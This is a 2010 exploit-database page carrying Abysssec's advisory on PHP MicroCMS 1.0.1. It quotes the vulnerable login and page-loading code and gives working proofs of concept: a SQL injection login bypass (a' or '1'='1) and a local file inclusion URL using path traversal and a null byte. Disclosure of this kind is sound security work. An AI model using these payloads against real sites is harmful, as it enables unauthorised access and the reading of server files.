[webapps / 0day] - PHP MicroCMS 1.0.1 Multiple Remote Vulner
Posted on 15 September 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>PHP MicroCMS 1.0.1 Multiple Remote Vulnerabilities | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Exploit category: webapps / 0day | Exploit author: Abysssec' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>================================================== PHP MicroCMS 1.0.1 Multiple Remote Vulnerabilities ================================================== Title : PHP MicroCMS 1.0.1 Multiple Remote Vulnerabilities Affected Version : PHP MicroCMS <= 1.0.1 Vendor Site : www.apphp.com/php-microcms/index.php Discovery : abysssec.com Description : This CMS have many critical vulnerability that we refere to some of those here: Vulnerabilites : 1. Authentication bypass with SQL Injection in login page: user_name and password parameters recived from the login form are passed to do_login function: login.php line 12-17: function Login() { $this->wrong_login = false; if (!$this->is_logged_in() && $_POST['submit'] == "Login" && !empty($_POST['user_name']) && !empty($_POST['password'])) $this->do_login($_POST['user_name'], $_POST['password']); else if ($_POST['submit_logout'] == "Logout") $this->do_logout(); $this->accounts = new Profiles($GLOBALS['user_session']->get_session_variable("session_account_id")); } in do_login function these parameters are passed to get_account_information function: login.php line 19-29: function do_login($user_name, $password, $do_redirect = true) { if ($account_information = $this->get_account_information($user_name, $password)) { $this->set_session_variables($account_information); if ($do_redirect) { header("Location: index.php "); exit; } }else{ $this->wrong_login = true; } } then these parameters without any validation are applied in SQL query directly: login.php line 48-55: function get_account_information($user_name, $password) { $sql = "SELECT ".DB_PREFIX."accounts.*, user_name AS account_name FROM ".DB_PREFIX."accounts WHERE user_name = '" . $user_name . "' AND // vulnerability here password = AES_ENCRYPT('" . $password . "', '" . DB_ENCRYPT_KEY . "')"; // vulnerability here return database_query($sql, DATA_ONLY, FIRST_ROW_ONLY); } POC: in login page enter: username: a' or '1'='1 password: a' or '1'='1 ---------------------------------------------------------------------------------------------------- 2. Local File Inclusion: index.php file line 21: $page = !empty($_GET['page']) ? $_GET['page'] : "home"; index.php file line 104,105: if (($page != "") && file_exists("page/" . $page . ".php")) { require("page/" . $page . ".php"); poc: http://localhost/microcms/index.php?page=../include/base.inc.php%00 # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-15]</pre></body></html>
